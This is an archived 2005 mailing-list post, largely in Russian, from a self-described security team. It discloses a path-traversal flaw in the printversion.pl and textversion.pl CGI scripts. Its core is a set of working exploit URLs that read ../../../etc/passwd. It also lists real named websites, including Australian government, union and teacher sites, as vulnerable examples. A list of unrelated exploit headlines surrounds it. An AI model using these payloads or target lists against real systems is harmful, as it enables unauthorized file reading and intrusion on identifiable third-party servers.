Related information PHP, ASP, CGI web applications security vulnerabilities Sql Injection in CJ Ultra Plus v1.0.3-1.0.4 Multiple Vulnerabilities In Invision Power Board Multiple vulnearabilities in e107 cms [EXPL] I-Mall Commerce i-mall.cgi Arbitrary Command Execution (Exploit) From:durito <durito_(at)_mail.ru> Date:04.05.2005Subject:чтение файлов в скриптах printversion.pl и textversion.plСкрипты printversion.pl и textversion.pl позволяют читать произвольные файлы на сервере _______________ Exploit - http://www.xxx.com/cgi-bin/textversion/textversion.pl?conf=conf.xml&file=../../../../etc/passwd http://www.xxx.com/cgi-bin/printversion/printversion.pl?conf=conf.xml&file=../../../etc/passwd _______________ Пример - http://lcnsw.labor.net.au/cgi-bin/printversion/printversion.pl?conf=conf.xml&file=../../../etc/passwd http://www.racismnoway.com.au/cgi-bin/printversion/printversion.pl?conf=conf.xml&file=../../../etc/passwd http://www.sca.nsw.gov.au/cgi-bin/printversion/printversion.pl?conf=conf.xml&file=../../../../etc/passwd http://www.sca.nsw.gov.au/cgi-bin/textversion/textversion.pl?conf=conf.xml&file=../../../../etc/passwd http://www.nswteachers.nsw.edu.au/cgi-bin/printversion/printversion.pl?conf=conf. xml&file=../../../../etc/passwd http://www.communitybuilders.nsw.gov.au/cgi-bin/textversion/textversion.pl?file=. ./../../../etc/passwd http://unionsafe.labor.net.au/cgi-bin/textversion/textversion.pl?conf=conf.xml&file=../../../../etc/passwd durito [durito@mail.ru] LwB Security Team [lwb57.org] Copyright 2002-2005 by LwB Security Team. All rights reserved. С уважением, durito [LwB Security Team] mailto:durito@mail.ru http://lwb57.org http://durito.narod.ru
PHP, ASP, CGI web applications security vulnerabilities
Sql Injection in CJ Ultra Plus v1.0.3-1.0.4
Multiple Vulnerabilities In Invision Power Board
Multiple vulnearabilities in e107 cms
[EXPL] I-Mall Commerce i-mall.cgi Arbitrary Command Execution (Exploit)
